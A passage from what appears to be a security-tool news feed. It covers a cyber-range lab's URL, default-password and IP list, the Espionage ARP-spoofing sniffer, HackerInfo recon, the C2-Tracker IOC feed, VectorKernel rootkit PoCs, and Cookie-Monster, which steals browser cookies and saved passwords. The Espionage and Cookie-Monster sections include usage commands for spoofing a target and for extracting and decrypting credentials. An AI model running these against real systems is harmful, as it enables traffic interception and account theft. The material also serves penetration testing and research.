  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: [email protected], default passowrd: mailpassword)
  • https://server.lab/iredadmin/ (default username: [email protected], default passowrd: mailpassword)
  • https://mail.server.lab/ (default username: [email protected], default passowrd: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: [email protected], default passowrd: mailpassword)
  • http://phising.lab/
  • http://10.0.0.200:8081/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username: [email protected], default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address

Attack

  • 10.0.0.100 attack.lab
  • 10.0.0.200 phising.lab
  • 10.0.0.201 server.lab
  • 10.0.0.201 mail.server.lab
  • 10.0.0.202 gophish.lab
  • 10.0.0.110 infectionmonkey.lab
  • 10.0.0.111 mongodb.lab
  • 10.0.0.112 purpleops.lab
  • 10.0.0.113 caldera.lab

Defense

  • 10.0.1.101 defense.lab
  • 10.0.1.10 dvwa.lab
  • 10.0.1.13 wackopicko.lab
  • 10.0.1.14 juiceshop.lab
  • 10.0.1.20 gitea.lab
  • 10.0.1.110 infectionmonkey.lab
  • 10.0.1.112 purpleops.lab
  • 10.0.1.113 caldera.lab

Monitor

  • 10.0.3.201 server.lab
  • 10.0.3.201 mail.server.lab
  • 10.0.3.9 mariadb.lab
  • 10.0.3.10 dvwa.lab
  • 10.0.3.11 dvwa-monitor.lab
  • 10.0.3.12 dvwa-modsecurity.lab
  • 10.0.3.102 monitor.lab
  • 10.0.3.30 wazuh-manager.lab
  • 10.0.3.31 wazuh-indexer.lab
  • 10.0.3.32 wazuh-dashboard.lab
  • 10.0.3.40 splunk.lab

Public

  • 10.0.2.101 defense.lab
  • 10.0.2.13 wackopicko.lab

Internet

  • 10.0.4.102 monitor.lab
  • 10.0.4.30 wazuh-manager.lab
  • 10.0.4.32 wazuh-dashboard.lab
  • 10.0.4.40 splunk.lab

Internal

  • 10.0.5.100 attack.lab
  • 10.0.5.12 dvwa-modsecurity.lab
  • 10.0.5.13 wackopicko.lab

License

This Docker Compose application is released under the MIT License. See the LICENSE file for details.



Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

By: Zion3R
25 April 2024 at 12:30

Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so, all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionag e was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper, scapylib only assists with HTTP requests and ARP.


Installation

1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help

Usage

  1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
    Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
  2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
    Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
  3. sudo python3 espionage.py --normal --iface wlan0
    Command 3 will still execute a clean packet sniff however, it will not save the data to a pcap file. Saving the sniff is recommended.
  4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
    Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
  5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
    Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
  6. sudo python3 espionage.py --iface wlan0 --onlyhttp
    Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
  7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
    Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
  8. sudo python3 espionage.py --iface wlan0 --urlonly
    Command 8 will only sniff and return sniffed urls visited by the victum. (works best with sslstrip).

  9. Press Ctrl+C in-order to stop the packet interception and write the output to file.

Menu

usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]

optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').

(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)

(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET

A Linux Packet Sniffing Suite for Automated MiTM Attacks (6)

Writeup

A simple medium writeup can be found here:
Click Here For The Official Medium Article

Ethical Notice

The developer of this program, Josh Schiavone, written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicous intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

License

MIT License
Copyright (c) 2024 Josh Schiavone




HackerInfo - Infromations Web Application Security

By: Zion3R
24 April 2024 at 12:30




Infromations Web Application Security


install :

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4


pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h



python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################

Usage:

Hackerinfo infromations Web Application Security (11)

Library install hackinfo:

sudo python setup.py install
pip3 install hackinfo



C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R
24 April 2024 at 02:23


Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. Actively working on making the backend more reliable


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

References



VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

By: Zion3R
18 April 2024 at 12:30


PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.

NOTE

Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.

Β 

Environment

All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:

  1. Enable Loading of Test Signed Drivers

  2. debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging

Each options require to disable secure boot.

Modules

Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.

Module Name Description
BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
BlockNewProc PoCs to block new process with Process Notify Callback method.
CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
DropProcAccess PoCs to drop process handle access with Object Notify Callback.
GetFullPrivs PoCs to get full privileges with DKOM method.
GetProcHandle PoCs to get full access process handle from kernelmode.
InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
ModHide PoCs to hide loaded kernel drivers with DKOM method.
ProcHide PoCs to hide process with DKOM method.
ProcProtect PoCs to manipulate Protected Process.
QueryModule PoCs to perform retrieving kernel driver loaded address information.
StealToken PoCs to perform token stealing from kernelmode.

TODO

More PoCs especially about following things will be added later:

  • Notify callback
  • Filesystem mini-filter
  • Network mini-filter

Recommended References



Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R
17 April 2024 at 12:30


Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make is installed on the linux prior to compiling.

make

to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



❌
❌